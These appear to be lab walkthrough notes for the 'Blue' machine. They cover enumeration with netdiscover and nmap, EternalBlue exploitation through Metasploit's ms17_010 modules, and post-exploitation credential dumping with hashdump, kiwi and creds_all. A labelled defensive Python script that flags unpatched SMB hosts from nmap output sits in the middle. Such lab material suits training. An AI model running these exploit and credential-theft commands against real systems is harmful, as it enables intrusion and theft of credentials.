Blue
Enumeration
sudo netdiscover -r 10.0.2.0/24
IP -> 10.0.2.6
nmap -T4 -p- -A <IP>
Metasploit way
- smb open
- windows 7 Professional 7601 Service Pack 1
This means it may be vulnerable to EternalBlue (smb_ms17_010).
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $IP
run
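From the defender's side, the same inference (SMB open plus a Windows 7 7601 Service Pack 1 banner) is a trigger for patch verification. The following added example, not part of the original notes, parses constructed `nmap -A -oX` output and lists the hosts whose MS17-010 update status should be confirmed; the `triage` function, the sample XML and the legacy-OS pattern are assumptions of the example.

```python
import re
import xml.etree.ElementTree as ET
# Constructed sample of `nmap -A -oX` output, trimmed to the fields used here.
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="10.0.2.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/></port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="...">
        <elem key="os">Windows 7 Professional 7601 Service Pack 1</elem>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.0.2.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/></port>
    </ports>
  </host>
</nmaprun>"""

# Older Windows families to flag; this list is an assumption of the example, not exhaustive.
LEGACY_OS = re.compile(r"Windows (XP|Vista|7|8(\.1)?|Server (2003|2008|2012))", re.I)

def triage(xml_text):
    """Return [(ip, os, reason)] for hosts that need MS17-010 patch verification."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "unknown"
        # Only hosts where TCP 445 is reported open are in scope.
        smb_open = any(
            p.get("portid") == "445" and p.find("state") is not None
            and p.find("state").get("state") == "open"
            for p in host.iter("port"))
        if not smb_open:
            continue
        os_elem = host.find(".//script[@id='smb-os-discovery']/elem[@key='os']")
        os_name = os_elem.text.strip() if os_elem is not None and os_elem.text else ""
        if LEGACY_OS.search(os_name):
            findings.append((ip, os_name, "legacy OS with SMB exposed: confirm MS17-010 patch"))
        elif not os_name:
            findings.append((ip, "unknown", "SMB exposed, OS not identified: check manually"))
    return findings

if __name__ == "__main__":
    for row in triage(SAMPLE_XML):
        print(*row, sep=" | ")
```

The OS banner alone does not show whether the update is installed, so each flagged host still needs its patch level checked on the machine itself.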
- Run the EternalBlue exploit to root the machine
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run
Can try changing the payload to a staged Meterpreter payload.
Manual way
Useful commands in Windows
Windows shell
- hashdump
- getuid
- sysinfo
- route print
- arp -a
- netstat -ano
- ps
Meterpreter
- enter in shell (shell)
- kiwi
- help
- creds_all